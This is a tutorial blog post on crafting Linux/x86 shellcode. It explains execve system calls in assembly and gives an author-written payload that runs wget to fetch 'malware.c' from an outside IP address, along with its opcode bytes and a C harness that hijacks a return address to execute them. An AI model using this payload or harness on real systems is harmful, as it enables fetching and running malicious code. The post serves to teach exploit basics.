Overview of Exploit Payload Crafting
[See the original post on my WordPress site]
According to Wikipedia:
‘shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called “shellcode” because it typically starts a command shell from which the attacker can control the compromised machine, but any piece of code that performs a similar task can be called shellcode.’
Perhaps the most straightforward example of this would be a buffer overflow exploit, where the shellcode is part of the oversized input that spills past the end of a buffer and is later executed. For this to happen, there must be a vulnerability, and an exploit must be created to set things up so that execution is redirected to the shellcode.
Assembler
Disassembling a random sysinternals binary (as an example) gives an output that, on the surface, looks almost unintelligible to most of us. However, it only looks unintelligible because it lacks context on its own. Let’s create some context by noting two features of the language:
Very limited vocabulary. Assembler code is built from a fairly small set of instructions (add, sub, mov, etc.), each of which tells the microprocessor to perform one specific operation on whatever values are passed to it.
Each register (EAX, ECX, etc.) is a small storage location inside the processor itself. Instructions move values between registers, memory and I/O ports, so the value sitting in a given register at the moment an instruction executes determines what that instruction does.
Shellcoding for the Linux/x86 Architecture
This principle is best illustrated with shellcode written for Linux, as there is a definite set of system calls mapped to specific numbers in /usr/src/linux/include/asm-i386/unistd.h (for the i386 architecture), and a specific register that holds the number when the call is made (in this case EAX). Meanwhile, the arguments for a system call are passed in EBX, ECX, EDX and, if more are needed, ESI, EDI and EBP. I haven’t the slightest idea what the equivalent is for a Windows operating system.
With this in mind, it’s now much easier to understand a segment of code I robbed from the InfoSec Institute’s site:
mov eax, 11
mov edx, 0
mov ebx, cmd
push edx
mov ecx,file
push ecx
push ebx
mov ecx,esp
int 80h
It places the value 11 in register EAX, which is the number of the execve() system call in asm-i386/unistd.h. EBX receives the address of ‘cmd’, the path of the program to run. The ‘push’ instructions then build the argument array on the stack in reverse order: first a NULL terminator (EDX holds 0), then the address of ‘file’, then the address of ‘cmd’. ‘mov ecx,esp’ points ECX at that array, and EDX, still 0, means no environment is passed. Finally, ‘int 80h’ raises a software interrupt that switches from user space to the kernel, which carries out the call.
The code above does nothing on its own, as it’s not yet a binary/executable. An executable must be in a specific format (ELF) for a Linux system to run it, with a data section and a text section. And just to make things more complicated, labels such as ‘cmd’ and ‘file’ in the text section are only addresses of strings that must be defined in the data section, as my own little malware-fetching example shows:
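; run /bin/wget with one argument via execve
section .data
get db '/bin/wget', 0
file db '192.169.0.100/malware.c', 0
section .text
global _start
_start:
mov eax, 11     ; execve is system call 11 on i386
mov edx, 0      ; envp = NULL
mov ebx, get    ; path of the program to run
push edx        ; argv[2] = NULL
mov ecx, file
push ecx        ; argv[1] = file
push ebx        ; argv[0] = get
mov ecx, esp    ; ECX points at argv
int 80h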
Getting the Payload to Execute
Another problem is that the shellcode can’t execute unless it’s already in a buffer with the processor’s instruction pointer pointing at it (which is what a successful buffer overflow arranges). For testing, what’s needed is a small C program that holds the opcodes in a buffer and transfers execution to them.
I’ve used the Netwide Assembler (NASM), which can generate object code in several formats (here 32-bit ELF, selected with -f elf), then used objdump (part of GNU binutils) to get the opcodes.
To assemble the code:
$ nasm -f elf Malware-Fetch.asm
To dump the object code:
$ objdump -d Malware-Fetch.o
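This gives us the opcodes in the second column of the output. Note that the addresses of the two strings are still unrelocated in an object file (EBX is loaded with 0 and ECX with 0x0a), so the bytes illustrate the format rather than a finished, position-independent payload. They are reformatted as escaped bytes and put into a little C container that should look something like: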
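/* Bytes from the object file: the two strings from .data, then the code from .text */
char shellcode[] = "\x2f\x62\x69\x6e\x2f\x77\x67\x65\x74\x00\x31\x39\x32"
"\x2e\x31\x36\x39\x2e\x30\x2e\x31\x30\x30\x2f\x6d\x61"
"\x6c\x77\x61\x72\x65\x2e\x63\x00\xb8\x0b\x00\x00\x00"
"\xba\x00\x00\x00\x00\xbb\x00\x00\x00\x00\x52\xb9\x0a"
"\x00\x00\x00\x51\x53\x89\xe1\xcd\x80"
;
int main(void)
{
int *ret;
/* Old trick: point ret at main's saved return address
   (assumes 32-bit x86, no stack protector, executable data) */
ret = (int *)&ret + 2;
/* Overwrite it so that main "returns" into the byte array */
(*ret) = (int)shellcode;
return 0;
}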